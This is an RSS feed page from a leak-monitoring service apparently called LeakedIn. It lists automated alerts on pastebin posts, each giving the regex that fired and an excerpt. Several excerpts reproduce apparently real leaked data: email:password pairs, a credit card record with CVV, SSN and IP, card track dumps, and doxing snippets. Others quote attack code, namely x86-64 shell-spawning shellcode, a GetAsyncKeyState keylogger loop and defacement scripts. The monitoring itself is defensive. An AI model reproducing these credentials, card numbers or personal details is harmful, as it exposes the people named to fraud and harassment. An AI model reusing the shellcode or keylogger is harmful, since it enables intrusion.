Quantcast
Channel: LeakedIn
Viewing all 5503 articles
Browse latest View live

Potential leak of data: Personal Information

$
0
0
Detected 1 occurrence(s) of ‘doxed': <------------DOXED BY (NAME)------------> ____________________________________________________________________________________ Table Of Contents 0x01 Reason for Dox. 0x02 Basic Information Source: http://pastebin.com/raw.php?i=dXbMHLtk

Potential leak of data: Simple Password

$
0
0
Detected 2 occurrence(s) of ‘^\s*pass(word|phrase|wd|code)*\s*(:|=|is|was)\s*[a-z0-9\-_\!]+$': 898978942389423991230121239012390213432342 username=timo montana password=qweasdzxc Detected 1 occurrence(s) of ‘^\s*pass[word]+\s*[:=]+[ \t]*[a-z0-9\-_\!]+$': 898978942389423991230121239012390213432342 username=timo montana password=qweasdzxc Source: http://pastebin.com/raw.php?i=jbSQEwUJ

Potential leak of data: Certificate

$
0
0
Detected 1 occurrence(s) of ‘^—–BEGIN CERTIFICATE—–‘: cisco/O=Salesforce.com, Inc./CN=*.desk.com i:/C=US/O=DigiCert Inc/CN=DigiCert SHA2 Secure Server CA 1 s:/C=US/O=DigiCert Inc/CN=DigiCert SHA2 Secure Server CA i:/C=US/O=DigiCert Inc/OU=www.digicert.com/CN=DigiCert Global Root CA --- Server certificate -----BEGIN CERTIFICATE----- MIIFGDCCBACgAwIBAgIQBC2a9T7KbsNbeGc1GxXoFDANBgkqhkiG9w0BAQ0FADBN MQswCQYDVQQGEwJVUzEVMBMGA1UEChMMRGlnaUNlcnQgSW5jMScwJQYDVQQDEx5E aWdpQ2VydCBTSEEyIFNlY3VyZSBTZXJ2ZXIgQ0EwHhcNMTQxMjEwMDAwMDAwWhcN MTcxMjE0MTIwMDAwWjBuMQswCQYDVQQGEwJVUzETMBEGA1UECBMKQ2FsaWZv Source: http://pastebin.com/raw.php?i=sWRFmjtU

Potential leak of data: List of Twitter Accounts

$
0
0
Detected 104 occurrence(s) of ‘http[s]*://[w\.]*twitter\.com/\S+': .com/BranderXYZ 5000 https://twitter.com/legendeal 5000 https://twitter.com/enervate_gaming 5000 https://twitter.com/gopro_gadgets 5000 https://twitter.com/worldwidenlp 3000 https://twitter.com/bryanmckay33 15000 https://twitter.com/druzyabar 25000 http://www.twitter.com/fajardrumgombes 5000 Source: http://pastebin.com/raw.php?i=Lj9grFGD

Potential leak of data: MySQL Connect Information

$
0
0
Detected 1 occurrence(s) of ‘mysql_[p]*connect\([“‘]{0,1}[a-z0-9\-\.\$]+[“‘]{0,1}\s*,': </ul> </div> </div> </div> function GetCasaByProfissao($profissao) { require 'Credentials.php'; mysql_connect($host,$user,$passwd) or die (mysql_error()); mysql_select_db($database); $query = "SELECT * FROM servico WHERE profissao = 'canalizador'"; $result = mysql_query($query) or die(mysql_error()); Source: http://pastebin.com/raw.php?i=RvCzdnhm

Potential leak of data: Amazon Access Key

$
0
0
Detected 4 occurrence(s) of ‘(access_key_id|secret_access_key)': PUBLIC=$(_sanitize_boolean "$Public") EVERTHING=$(_sanitize_boolean "$Everything") AWS_ACCOUNT_ID="$Account" AWS_ACCESS_KEY_ID="$AwsAccessKey" AWS_SECRET_ACCESS_KEY="$AwsSecretAccessKey" REGION=$(_string_to_lower "$Region") export AWS_ACCESS_KEY_ID AWS_SECRET_ACCESS_KEY FILTERS=( Name=state,Values=available Name=image-type,Values=machine Name=virtualization-type,Values=hvm Name=tag-key,Values=RootDeviceType Name=tag-value,Values=ebs,instance-store Name=owner-id,Values=${AWS_ACCOUNT_ID} $(if [[ $EVERTHING == Source: http://pastebin.com/raw.php?i=H8kTate8

Potential leak of data: US SSN

$
0
0
Detected 7 occurrence(s) of ‘(ss(n)?|social(\s*security)?)[\s :]+((?!000)(?!666)([0-6]\d{2}|7[0-2][0-9]|73[0-3]|7[5-6][0-9]|77[0-1]))[\- ]((?!00)\d{2})[\- ]((?!0000)\d{4})': ttp://goo.gl/xamVNF ################# Name on Card: Richard Brown Card Type: Visa card Card Number: 4919010000108440 Cvv: 915 Expiry Month: 11 Expiry Year: 2015 Card Limit: Isuing Bank: fia Phone: 0230402340432 SSN: 023-55-4213 MMN: 21 Ip: 79.143.163.215 Time: Tuesday 27th of January 2015 09:44:51 PM Browser: FIREFOX Counter: 1491 […]

Potential leak of data: Email Addresses List

$
0
0
Detected 420 occurrence(s) of ‘[\s\|,;’]+[a-z0-9\-\._]+@[a-z0-9\-\.]+\.[a-z]{2,4}[\s\|,;:’]+': h-in-3.webhostbox.net [103.21.58.250]:56072 P=esmtps X=TLSv1:DHE-RSA-AES256-SHA:256 S=32751 id=003001d0a59d$e8ec4070$bac4c150$@com T="RE: re lr copy" for accounts@megabound.in info@megabound.in purchase@megabound.in 2015-06-13 05:58:09 1Z3eSH-003TV1-8q ** info@megabound.in (accounts@megabound.in) <accounts@megabound.in> R=virtual_user_maildir_overquota: Mailbox quota exceeded 2015-06-13 05:58:09 1Z3eSH-003TV1-8q => accounts <accounts@megabound.in> R=virtual_user T=virtual_userdelivery Source: http://pastebin.com/raw.php?i=syHbK5m2

Potential leak of data: Hacking Notification

$
0
0
Detected 5 occurrence(s) of ‘(h[a4]ck[e3]d|[p0]wn[e3]d|d[e3]f[a4]c[e3]d) by': ipt language="JavaScript"> var brzinakucanja = 200; var pauzapor = 2000; var vremeid = null; var kretanje = false; var poruka = new Array(); var slporuka = 0; var bezporuke = 0; poruka[0] = " Hacked by Play-Boy " poruka[1] = " Hacked by Play-Boy" function prikaz() { var text […]

Potential leak of data: Hacking Notification

$
0
0
Detected 4 occurrence(s) of ‘(h[a4]ck[e3]d|[p0]wn[e3]d|d[e3]f[a4]c[e3]d) by': ont>:<font style="color:rgb(7, 124, 44)">-</font> 1l4by0w :( </marquee> </div> </div> <center> <div id="loading"><br><br><br> <img src="http://s1.postimg.org/m8ykboqtb/test.jpg" style="border-radius:2000px;" height="400px" width="400px"><Br> <h2>:: Hacked by ::</h2> <h1>~Finn</h1> </div> </body> Source: http://pastebin.com/raw.php?i=LAKZK0xW

Potential leak of data: Windows GetAsyncKeyState API Call

$
0
0
Detected 1 occurrence(s) of ‘GetAsyncKeyState\(‘: while(1) { sleep(10);/*to prevent 100% cpu usage*/ for(character=8;character<=222;character++) { if(GetAsyncKeyState(character)==-32767) { FILE *file; file=fopen(FileName,"a+"); if(file==NULL) { Source: http://pastebin.com/raw.php?i=GntYvXy5

Potential leak of data: Simple Password

$
0
0
Detected 2 occurrence(s) of ‘^\s*pass(word|phrase|wd|code)*\s*(:|=|is|was)\s*[a-z0-9\-_\!]+$': 898978942389423991230121239012390213432342 username=hijack wife password=1212123 Detected 1 occurrence(s) of ‘^\s*pass[word]+\s*[:=]+[ \t]*[a-z0-9\-_\!]+$': 898978942389423991230121239012390213432342 username=hijack wife password=1212123 Source: http://pastebin.com/raw.php?i=hqsAJ8LH

Potential leak of data: Amazon Access Key

$
0
0
Detected 1 occurrence(s) of ‘(access_key_id|secret_access_key)': # in a Rails controller action string_to_sign = params["to_sign"] encoded = Base64.encode64( OpenSSL::HMAC.digest( OpenSSL::Digest::Digest.new("sha1"), ENV["S3_MULTIPART_UPLOAD_SECRET_ACCESS_KEY"], string_to_sign)).gsub("\n","") render :text => encoded, :status => 200 Source: http://pastebin.com/raw.php?i=kywYGatZ

Potential leak of data: Amazon Access Key

$
0
0
Detected 1 occurrence(s) of ‘(access_key_id|secret_access_key)': bucket = <s3 bucket name> s3key = <s3 file key> # use a random uniq key { "data-aws-id" => ENV["S3_MULTIPART_UPLOAD_ACCESS_KEY_ID"], "data-bucket" => bucket, "data-key" => s3key, "data-signer-url" => <your-data-signer-url> } Source: http://pastebin.com/raw.php?i=kLfS8ZPN

Potential leak of data: List of Twitter Accounts

$
0
0
Detected 98 occurrence(s) of ‘http[s]*://[w\.]*twitter\.com/\S+': r.com/florifyapp 5000 https://twitter.com/PerreaultMag 5000 https://twitter.com/InfinityRecordI 5000 https://twitter.com/superpeacom 5000 https://twitter.com/Criiq_inc 5000 https://twitter.com/bookingtoyou 5000 https://twitter.com/vandevi_hing 2500 https://twitter.com/tyresoles 2500 Source: http://pastebin.com/raw.php?i=7PqKZiNt

Potential leak of data: Email/Password Dump

$
0
0
Detected 16 occurrence(s) of ‘^[a-z0-9\-\._]+@[a-z0-9\-\.]+\.[a-z]{2,4}[ \t;,:\|]+\S+': _yun@yahoo.com:ethanyun123 franco_suicune@hotmail.com:elrichmc777 kaye.christensen@gmail.com:Christensen1 marygrace0428@yahoo.com:ariannacee0428 lemusjuanjose@gmail.com:Chenenito12 knyflot@broadpark.no:Rusken123 msrtina.spatz@gmail.com:Ramybaer2004 maxxgrubb@gmail.com:99erreiP19izzU Source: http://pastebin.com/raw.php?i=sDnpiB8d

Potential leak of data: Shellcode

$
0
0
Detected 6 occurrence(s) of ‘\\x[0-9a-f]{2}\\x[0-9a-f]{2}\\x[0-9a-f]{2}\\x[0-9a-f]{2}\\x[0-9a-f]{2}\\x[0-9a-f]{2}\\x[0-9a-f]{2}\\x[0-9a-f]{2}\\x[0-9a-f]{2}\\x[0-9a-f]{2}': \x02\x00\x11\x5c\x48\x89\xe6\x6a" shellcode += "\x10\x5a\x6a\x31\x58\x0f\x05\x6a\x32\x58\x0f\x05\x48" shellcode += "\x31\xf6\x6a\x2b\x58\x0f\x05\x48\x97\x6a\x03\x5e\x48" shellcode += "\xff\xce\x6a\x21\x58\x0f\x05\x75\xf6\x6a\x3b\x58\x99" shellcode += "\x48\xbb\x2f\x62\x69\x6e\x2f\x73\x68\x00\x53\x48\x89" shellcode += "\xe7\x52\x57\x48\x89\xe6\x0f\x05" Detected 7 occurrence(s) of ‘shellcode': 5a\x6a\x31\x58\x0f\x05\x6a\x32\x58\x0f\x05\x48" shellcode += "\x31\xf6\x6a\x2b\x58\x0f\x05\x48\x97\x6a\x03\x5e\x48" shellcode += "\xff\xce\x6a\x21\x58\x0f\x05\x75\xf6\x6a\x3b\x58\x99" shellcode += "\x48\xbb\x2f\x62\x69\x6e\x2f\x73\x68\x00\x53\x48\x89" shellcode += "\xe7\x52\x57\x48\x89\xe6\x0f\x05" Source: http://pastebin.com/raw.php?i=mkzqRjhe

Potential leak of data: VISA Credit Card

$
0
0
Detected 1 occurrence(s) of ‘[ \t:=”‘]+4[0-9]{12}(?:[0-9]{3})?': USA [SC 101] CLASSIC: [514209] [13] * Master Card PULSE EFT USA [SC 101] [514018] [4] * Master Card CREDIT NORWEST BANK NEVADA USA [SC 101 Format Of My Dumps: Track1 : B4096663104697113^FORANTO/CHRI STOPHER M^09061012735200521000000 , Track2 : 4096663104697113=0906101273525 21 372376064851003=0904051136147; PURCELL/JOHN 5232258252218386=0904101000007 2500604 4217642188250286=1011101803115 5200000;B42176421882 50286^POPOVICH/SHERRY ^10111018031155200000 RULES: […]

Potential leak of data: Shellcode

$
0
0
Detected 1708 occurrence(s) of ‘\\x[0-9a-f]{2}\\x[0-9a-f]{2}\\x[0-9a-f]{2}\\x[0-9a-f]{2}\\x[0-9a-f]{2}\\x[0-9a-f]{2}\\x[0-9a-f]{2}\\x[0-9a-f]{2}\\x[0-9a-f]{2}\\x[0-9a-f]{2}': s/Career.aspx">\xe4\xba\xba\xe6\x89\x8d\xe6\x8b\x9b\xe8\x81\x98</a></li><li><a href="http://www.aastocks.com/tc/AboutUs/Disclaimer.aspx">\xe5\x85\x8d\xe8\xb2\xac\xe8\x81\xb2\xe6\x98\x8e</a></li><li><a href="http://www.aastocks.com/tc/AboutUs/Privacy.aspx">\xe7\xa7\x81\xe9\x9a\xb1\xe6\xa2\x9d\xe4\xbe\x8b</a></li> </ul> </div> <!-- Begin GA --> <script type="text/javascript">\r(function () {\rvar ga = document.createElement(\'script\'); ga.type = \'text/javascript\'; ga.async = true;\rga.src = (\'https:\' == document.location.protocol ? \'https://s Detected 2 occurrence(s) of ‘http:\/\/.*\.\.\/\.\.\/\.\.': function () { if ($.cookie("hkg1_hkg8") != "1") { $.ajax({ url: "http://hkg1.aastocks.com/ad/delivery/getcookies.php", dataType: "script", cache: true }); } […]

Potential leak of data: Personal Information

$
0
0
Detected 1 occurrence(s) of ‘doxed': ######################################################################################## # #Doxed# # ######################################################################################## ######################################### #Prénom : Stéphane # #Nom : Pinaud Source: http://pastebin.com/raw.php?i=4NykPEjc
Viewing all 5503 articles
Browse latest View live


<script src="https://jsc.adskeeper.com/r/s/rssing.com.1596347.js" async> </script>